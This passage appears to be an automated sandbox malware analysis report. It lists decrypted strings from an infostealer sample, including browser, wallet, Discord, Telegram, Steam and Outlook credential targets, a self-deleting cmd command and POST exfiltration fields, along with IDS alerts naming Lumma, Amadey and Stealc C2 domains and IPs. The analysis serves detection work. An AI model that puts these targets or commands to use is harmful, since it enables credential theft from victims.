Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CURRENT
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: chrome-extension_
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Local State
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: profiles.ini
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: chrome
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: opera
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: firefox
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: wallets
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: %08lX%04lX%lu
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: ProductName
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: x32
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: x64
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: ProcessorNameString
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: DisplayName
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: DisplayVersion
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Network Info:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - IP: IP?
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - Country: ISO?
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: System Summary:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - HWID:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - OS:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - Architecture:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - UserName:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - Computer Name:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - Local Time:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - UTC:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - Language:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - Keyboards:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - Laptop:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - Running Path:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - CPU:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - Threads:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - Cores:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - RAM:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - Display Resolution:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: - GPU:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: User Agents:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Installed Apps:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: All Users:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Current User:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Process List:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: system_info.txt
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: freebl3.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: mozglue.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: msvcp140.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: nss3.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: softokn3.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: vcruntime140.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: \Temp\
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: .exe
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: runas
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: open
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: /c start
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: %DESKTOP%
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: %APPDATA%
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: %USERPROFILE%
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: %DOCUMENTS%
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: %PROGRAMFILES%
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: %RECENT%
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: *.lnk
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: files
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: \discord\
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: \Local Storage\leveldb
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: \Telegram Desktop\
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: key_datas
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: map*
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: F8806DD0C461824F*
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Telegram
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Tox
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: *.tox
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: *.ini
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Password
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: 00000001
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: 00000002
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: 00000003
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: 00000004
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Pidgin
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: \.purple\
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: accounts.xml
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: token:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Software\Valve\Steam
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: SteamPath
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: \config\
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: ssfn*
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: config.vdf
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: DialogConfig.vdf
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: libraryfolders.vdf
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: loginusers.vdf
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: \Steam\
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: sqlite3.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: browsers
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: done
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: soft
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: \Discord\tokens.txt
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: https
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: POST
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: HTTP/1.1
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: hwid
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: build
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: token
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: file_name
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: file
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: message
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: screenshot.jpg
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50232 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50234 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50235 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50236 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50237 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50238 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50242 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50243 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50244 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50245 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50246 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50249 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50253 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50258 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50259 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50262 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50264 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50271 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50272 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50274 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50282 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50285 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50289 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50290 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50294 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50296 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50302 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50309 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50313 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50316 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50325 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50326 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50329 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50328 version: TLS 1.2
Source: Binary string: my_library.pdbU source: 7a5878ed96.exe, 0000000A.00000003.2870739086.0000000004DEB000.00000004.00001000.00020000.00000000.sdmp, 7a5878ed96.exe, 0000000A.00000002.2911715801.00000000005EC000.00000040.00000001.01000000.0000000F.sdmp, num.exe, 0000001D.00000000.3018577142.00000000001BC000.00000008.00000001.01000000.00000017.sdmp, 7a5878ed96.exe, 0000001F.00000003.3079747725.000000000502B000.00000004.00001000.00020000.00000000.sdmp, 7a5878ed96.exe, 0000001F.00000002.3169928437.00000000005EC000.00000040.00000001.01000000.0000000F.sdmp, num[1].exe.8.dr
Source: Binary string: my_library.pdb source: 7a5878ed96.exe, 0000000A.00000003.2870739086.0000000004DEB000.00000004.00001000.00020000.00000000.sdmp, 7a5878ed96.exe, 0000000A.00000002.2911715801.00000000005EC000.00000040.00000001.01000000.0000000F.sdmp, num.exe, 0000001D.00000000.3018577142.00000000001BC000.00000008.00000001.01000000.00000017.sdmp, 7a5878ed96.exe, 0000001F.00000003.3079747725.000000000502B000.00000004.00001000.00020000.00000000.sdmp, 7a5878ed96.exe, 0000001F.00000002.3169928437.00000000005EC000.00000040.00000001.01000000.0000000F.sdmp, num[1].exe.8.dr
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 1664VO856PFRR45SNXLF.exe, 00000003.00000002.2439994017.0000000000C92000.00000040.00000001.01000000.00000006.sdmp, 1664VO856PFRR45SNXLF.exe, 00000003.00000003.2302933852.0000000004640000.00000004.00001000.00020000.00000000.sdmp, DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe, 00000020.00000003.3105769279.0000000004900000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: number of queries: 1911
Source: firefox.exe Memory has grown: Private usage: 1MB later: 191MB

Networking

barindex
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:51711 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:59031 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:49432 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:59329 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:53590 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49709 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49706 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49708 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49704 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49707 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49711 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49710 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:50176 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:51829 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:58736 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50190
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:59738 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50232 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50231 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50234 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50235 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50236 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50237 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50238 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50239 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50242 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:65441 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:64757 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:60704 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:63390 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50243 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50240 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50244 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50245 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50249 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50253 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:61354 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:57616 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50258 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50259 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50264 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50261 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50266 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50271 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50272 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:50205 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50246 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50282 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50290 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:53046 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50294 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:63515 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50291 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50262 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50296 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50248 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50302 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50303 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50335 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49711 -> 188.114.96.3:443
